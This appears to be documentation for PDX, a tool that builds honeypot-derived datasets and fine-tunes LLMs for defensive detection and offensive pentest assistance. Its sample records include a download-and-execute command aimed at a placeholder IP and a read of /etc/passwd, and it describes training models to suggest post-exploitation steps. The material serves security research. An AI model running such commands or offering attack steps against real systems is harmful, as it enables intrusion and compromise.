Fine-tuning

PDX generates training datasets that can be used to fine-tune LLMs for cybersecurity tasks — both defensive (detection, alerting) and offensive (pentest assistance, TTP reconstruction).

Requirements

Resource    Minimum   Recommended
GPU VRAM    8 GB      16 GB+
RAM         16 GB     32 GB
Disk        20 GB     50 GB
Framework   Unsloth   Unsloth

Supported base models

Model       Size       Best for
Qwen 2.5    7B / 14B   Fast iteration, good multilingual support
Llama 3.3   8B / 70B   English-focused, strong reasoning

Quick fine-tune

python training/finetune_pdx.py \
  --dataset training_output/data_router/defensive/sft_detection_patterns.jsonl \
  --model qwen \
  --epochs 3 \
  --rank 16
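The dataset is JSONL: one JSON object per line. A minimal sketch of what a single SFT record might look like (the field names here are assumptions in the common instruction-tuning convention; inspect your generated files for the actual PDX schema):

```python
import json

# Hypothetical SFT record; real field names come from the PDX
# data_router output and may differ.
record = {
    "instruction": "Identify the MITRE ATT&CK tactic for this SSH session.",
    "input": "wget http://203.0.113.5/x.sh && chmod +x x.sh && ./x.sh",
    "output": "Execution (TA0002): the attacker downloads and runs a payload.",
}

# JSONL = one json.dumps() result per line, newline-separated.
line = json.dumps(record)
parsed = json.loads(line)  # round-trips cleanly
```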

Options

Flag        Default     Description
--dataset   (required)  Path to JSONL training data
--model     qwen        Base model (qwen or llama)
--epochs    3           Training epochs
--rank      16          LoRA rank (higher = more capacity, more VRAM)
--resume    false       Resume from checkpoint

Training a defensive model

# Generate defensive datasets first
python -m pdx.training.data_router generate --defensive

# Train on detection patterns
python training/finetune_pdx.py \
  --dataset training_output/data_router/defensive/sft_detection_patterns.jsonl \
  --model qwen --epochs 5 --rank 16

# Train on lure effectiveness (DPO)
python training/finetune_pdx.py \
  --dataset training_output/data_router/defensive/dpo_lure_quality.jsonl \
  --model qwen --epochs 3 --rank 16
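Unlike SFT records, DPO records pair a preferred response with a rejected one for the same prompt. A hedged sketch of what one dpo_lure_quality.jsonl record could contain (field names follow the widespread prompt/chosen/rejected DPO convention; the actual PDX schema may differ):

```python
import json

# Hypothetical DPO preference pair for lure-quality training.
record = {
    "prompt": "Rate this honeypot lure: a fake /home/dev/.aws/credentials file.",
    "chosen": "High-value lure: credential files reliably attract lateral-movement attempts.",
    "rejected": "Looks fine.",
}

pair = json.loads(json.dumps(record))
print(sorted(pair))  # ['chosen', 'prompt', 'rejected']
```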

After training, the model can:

  • Identify MITRE ATT&CK tactics from SSH command sequences
  • Score the threat level of observed commands
  • Evaluate which persona configurations are most effective
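Before committing to a multi-epoch run, it can be worth validating the dataset file. A small self-contained sketch (it writes a throwaway file rather than touching your real training_output/ directory):

```python
import json
import tempfile
from pathlib import Path

def validate_jsonl(path):
    """Return the record count, raising if any line is not valid JSON."""
    count = 0
    with open(path) as f:
        for n, line in enumerate(f, 1):
            if not line.strip():
                continue  # tolerate trailing blank lines
            try:
                json.loads(line)
            except json.JSONDecodeError as e:
                raise ValueError(f"{path}: bad JSON on line {n}: {e}")
            count += 1
    return count

# Demo on a throwaway file
tmp = Path(tempfile.mkdtemp()) / "sample.jsonl"
tmp.write_text('{"a": 1}\n{"b": 2}\n')
print(validate_jsonl(tmp))  # 2
```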

Training an offensive model

# Generate offensive datasets first
python -m pdx.training.data_router generate --offensive

# Train on attack chains
python training/finetune_pdx.py \
  --dataset training_output/data_router/offensive/sft_attack_chains.jsonl \
  --model llama --epochs 5 --rank 32

# Train on kill chains (RAFT)
python training/finetune_pdx.py \
  --dataset training_output/data_router/offensive/raft_kill_chains.jsonl \
  --model llama --epochs 3 --rank 32

After training, the model can:

  • Reconstruct post-exploitation sequences from partial observations
  • Suggest next steps in a pentest based on current position
  • Map observed commands to MITRE ATT&CK techniques
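The technique-mapping capability can be approximated without a model for a handful of well-known commands, which is useful as a baseline when evaluating the fine-tuned model. A toy lookup (the technique IDs are real MITRE ATT&CK identifiers; the substring heuristic is illustrative only and not part of PDX):

```python
# Toy baseline: substring-based mapping from observed commands to
# MITRE ATT&CK technique IDs. Real coverage requires the trained model;
# this handles only a few unambiguous cases.
RULES = {
    "whoami": "T1033",         # System Owner/User Discovery
    "crontab": "T1053.003",    # Scheduled Task/Job: Cron
    "ssh-keygen": "T1098.004", # Account Manipulation: SSH Authorized Keys
    "history -c": "T1070.003", # Indicator Removal: Clear Command History
}

def map_command(cmd):
    return [tid for key, tid in RULES.items() if key in cmd]

print(map_command("whoami && history -c"))  # ['T1033', 'T1070.003']
```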

Training a dual-perspective model

# Generate combined datasets
python -m pdx.training.data_router generate --combined

# Train on dual-perspective analysis
python training/finetune_pdx.py \
  --dataset training_output/data_router/combined/react_dual_perspective.jsonl \
  --model qwen --epochs 5 --rank 32

This produces a model that can analyze the same command sequence from both offensive and defensive perspectives, the most distinctive output of the PDX pipeline.
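At inference time, a dual-perspective model is given the same sequence under each role. A minimal sketch of how that framing might be built (the prompt wording is an assumption for illustration, not the PDX template):

```python
# Hypothetical prompt builder for dual-perspective analysis.
# The actual PDX inference template may differ.
def dual_prompts(commands):
    seq = "\n".join(commands)
    return {
        "offensive": f"As a red-team operator, suggest the next step after:\n{seq}",
        "defensive": f"As a SOC analyst, assess the threat level of:\n{seq}",
    }

prompts = dual_prompts(["id", "uname -a", "cat /etc/passwd"])
print(sorted(prompts))  # ['defensive', 'offensive']
```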

VRAM management

The fine-tuning script includes automatic VRAM safety checks:

[VRAM] Total: 15.8 GB | Used: 2.1 GB | Free: 13.7 GB
[VRAM] Estimated requirement for Qwen-7B + LoRA rank 16: ~6 GB
[VRAM] Status: OK — proceeding

If Ollama is running, the script will warn you — Ollama and fine-tuning compete for VRAM.

For limited VRAM (8 GB)

Use --rank 8 and --model qwen (7B). This configuration needs roughly 6 GB of VRAM, leaving headroom for the training batch on an 8 GB card.
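The relationship between model size, LoRA rank, and VRAM can be sketched with a rough heuristic. The constants below are illustrative assumptions (roughly matching 4-bit quantized weights plus adapters), not the actual estimator inside the PDX script:

```python
# Rough, illustrative VRAM estimator: 4-bit quantized base model
# plus LoRA adapters and training-batch overhead. Constants are
# assumptions, not measurements from the PDX script.
def estimate_vram_gb(model_params_b, lora_rank, batch_overhead_gb=1.5):
    base = model_params_b * 0.6   # ~0.6 GB per billion params at 4-bit
    adapters = 0.05 * lora_rank   # adapters + optimizer state grow with rank
    return round(base + adapters + batch_overhead_gb, 1)

print(estimate_vram_gb(7, 8))   # ~6.1 GB: fits an 8 GB card
print(estimate_vram_gb(7, 16))  # slightly more, as rank grows
```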